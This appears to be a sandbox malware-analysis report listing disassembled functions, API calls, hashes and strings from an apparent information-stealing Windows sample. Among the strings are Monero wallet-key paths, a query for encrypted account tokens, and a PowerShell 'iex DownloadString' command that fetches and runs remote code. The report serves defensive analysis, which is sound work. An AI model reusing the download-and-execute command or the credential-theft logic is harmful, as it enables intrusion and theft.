                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 035aae9d00eadbd1a36f63f80a79d5b59d6cb939fb70fdf8b715b5359126b4f1
                              • Instruction ID: 5ca2bda5b615f77f14f84fbc0f50638e1c621edf546af79f81e9b4cd55fac502
                              • Opcode Fuzzy Hash: 035aae9d00eadbd1a36f63f80a79d5b59d6cb939fb70fdf8b715b5359126b4f1
                              • Instruction Fuzzy Hash: 96613CB59142689BDB24DB50CC41FEAB7BCBF58300F0481E9E649A6191DBB05FC9CFA1
                              Function 0014BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0014BC9F
                                • Part of subcall function 00158E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00158E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0014BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0014BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0014BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 3c7c4a6771cf84775b494c460d86d69053323a25ad32cf9b958a0108d3764587
                              • Instruction ID: 8976764d995c1763aba6d0dd797af14951970b34024c92868e36b2e7f2898301
                              • Opcode Fuzzy Hash: 3c7c4a6771cf84775b494c460d86d69053323a25ad32cf9b958a0108d3764587
                              • Instruction Fuzzy Hash: 2AB13371950118DBDB04EBA0CC96DEE733CBF64302F844259F916AA191EF346A4DCB62
                              Function 00156770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 408a58d1beff1afb779a740beda3d06ef9159dd0df7226932aa3bbdee6554edf
                              • Instruction ID: 207cac6ac78645cc1d0aa9bdcc851c3323b8a47db8a1029708b6c4a479c8f27a
                              • Opcode Fuzzy Hash: 408a58d1beff1afb779a740beda3d06ef9159dd0df7226932aa3bbdee6554edf
                              • Instruction Fuzzy Hash: A5F05E31904309EFE3459FE0E90972CBB78FB08703F1401DAF6198B290D6784B41ABD6
                              Function 00144FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00144FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00144FD1
                              • InternetOpenA.WININET(00160DDF,00000000,00000000,00000000,00000000), ref: 00144FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00145011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00145041
                              • InternetCloseHandle.WININET(?), ref: 001450B9
                              • InternetCloseHandle.WININET(?), ref: 001450C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 46c0f8795d39ec9d5003eafe7675b1006c5675303c38c0215b1ff34f5460cd18
                              • Instruction ID: d111ffa4c46f61e0b177e548e70375b93820c359e8671dc95faa6326ef3514ed
                              • Opcode Fuzzy Hash: 46c0f8795d39ec9d5003eafe7675b1006c5675303c38c0215b1ff34f5460cd18
                              • Instruction Fuzzy Hash: 1B3107B4A40218ABDB20CF94CC85BDDB7B8EB48704F5081D9FB09A7281C7746EC58F99
                              Function 001583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00158426
                              • wsprintfA.USER32 ref: 00158459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0015847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0015848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00158499
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,00DDE110,00000000,000F003F,?,00000400), ref: 001584EC
                              • lstrlen.KERNEL32(?), ref: 00158501
                              • RegQueryValueExA.ADVAPI32(00000000,00DDE128,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00160B34), ref: 00158599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00158608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0015861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 7364e97c8bc0ac8c8a76f99c871c39912e0f0487948b5caf2361d72306c44b29
                              • Instruction ID: ca3cf2c35d96149b67cabfd46ed4175ce24c62c4b98c4356a726ae943cbc8c78
                              • Opcode Fuzzy Hash: 7364e97c8bc0ac8c8a76f99c871c39912e0f0487948b5caf2361d72306c44b29
                              • Instruction Fuzzy Hash: 792119B1940218EBEB24DB54DC85FE9B7B8FB48701F00C5D9E609A6140DF71AA86CFE4
                              Function 00157690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001576A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001576AB
                              • RegOpenKeyExA.ADVAPI32(80000002,00DCB380,00000000,00020119,00000000), ref: 001576DD
                              • RegQueryValueExA.ADVAPI32(00000000,00DDE230,00000000,00000000,?,000000FF), ref: 001576FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00157708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 03a35ef3b749435ae29e10181b10a327fbeb53b72b5dfd5ff6c6b0389d3a5d49
                              • Instruction ID: 6a877f63466faed1609752363ae69816f4c0be3df1d55915a96104601b8dce50
                              • Opcode Fuzzy Hash: 03a35ef3b749435ae29e10181b10a327fbeb53b72b5dfd5ff6c6b0389d3a5d49
                              • Instruction Fuzzy Hash: EE014FB5A04704FBFB01DBE4ED4AF6ABBBCEB48701F104495FE04AB290D7B499048B61
                              Function 00157720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00157734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0015773B
                              • RegOpenKeyExA.ADVAPI32(80000002,00DCB380,00000000,00020119,001576B9), ref: 0015775B
                              • RegQueryValueExA.ADVAPI32(001576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0015777A
                              • RegCloseKey.ADVAPI32(001576B9), ref: 00157784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 08cd363c496e3a5aa9267bdb8bf33ab73bbb256c5c2c80da856899adf9fce66c
                              • Instruction ID: 72eec97b5c87827521261db8b2d592851104fef30c6f2f4063fb131a61b5ff55
                              • Opcode Fuzzy Hash: 08cd363c496e3a5aa9267bdb8bf33ab73bbb256c5c2c80da856899adf9fce66c
                              • Instruction Fuzzy Hash: B90167B5A40308FBE701DBE4DC4AFAEBBBCEB48701F004595FA05A7281D77455008B61
                              Function 001499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001499EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00149A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00149A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0014148F,00000000), ref: 00149A5A
                              • LocalFree.KERNEL32(0014148F), ref: 00149A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00149A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 14b90cc84fdaeb023cb3b4f77ea435ccf7e5437a0c2a479d0e6e1a47e14f7f63
                              • Instruction ID: 078b3c733953d914c8dc676758b95f26ff773be431e2d857d90d8c27ff94938d
                              • Opcode Fuzzy Hash: 14b90cc84fdaeb023cb3b4f77ea435ccf7e5437a0c2a479d0e6e1a47e14f7f63
                              • Instruction Fuzzy Hash: 24312174A00309EFDB14CF94C945BAE77B9FF48341F204199E911A72A0D778A941CFA1
                              Function 00154780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,00DDE488), ref: 001547DB
                                • Part of subcall function 00158DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00158E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00154801
                              • lstrcat.KERNEL32(?,?), ref: 00154820
                              • lstrcat.KERNEL32(?,?), ref: 00154834
                              • lstrcat.KERNEL32(?,00DCAB58), ref: 00154847
                              • lstrcat.KERNEL32(?,?), ref: 0015485B
                              • lstrcat.KERNEL32(?,00DDDA28), ref: 0015486F
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 00158D90: GetFileAttributesA.KERNEL32(00000000,?,00141B54,?,?,0016564C,?,?,00160E1F), ref: 00158D9F
                                • Part of subcall function 00154570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00154580
                                • Part of subcall function 00154570: RtlAllocateHeap.NTDLL(00000000), ref: 00154587
                                • Part of subcall function 00154570: wsprintfA.USER32 ref: 001545A6
                                • Part of subcall function 00154570: FindFirstFileA.KERNEL32(?,?), ref: 001545BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: b8bf6ebb79f368371be1d6c756213e6d1083bef7cd4c9af76a10e424568fe416
                              • Instruction ID: 415abe3b8f69e826ad1ac4f6ad039e1f69e357c7ae33e2e3da0bf25877ef9b98
                              • Opcode Fuzzy Hash: b8bf6ebb79f368371be1d6c756213e6d1083bef7cd4c9af76a10e424568fe416
                              • Instruction Fuzzy Hash: EC3184B2900318A7DB11FBB0DC85EED737CAB58705F404589B725AA081EF74978DCBA1
                              Function 00152C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00152D85
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00152CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00152D04
                              • ')", xrefs: 00152CB3
                              • <, xrefs: 00152D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 84b5b374444bb2e543abde0323e03bf92e1b7f8d7158f7a4c1405d2bbf402720
                              • Instruction ID: a61e0a714b37e7ca661f38156437a27bc583827d8e88ff016e4f990dd62832a6
                              • Opcode Fuzzy Hash: 84b5b374444bb2e543abde0323e03bf92e1b7f8d7158f7a4c1405d2bbf402720
                              • Instruction Fuzzy Hash: AC41D271C90208DADB15EBA0CC92BDDB774BF24302F904119E926AF191EF756A4ECF91
                              Function 00149E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00149F41
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
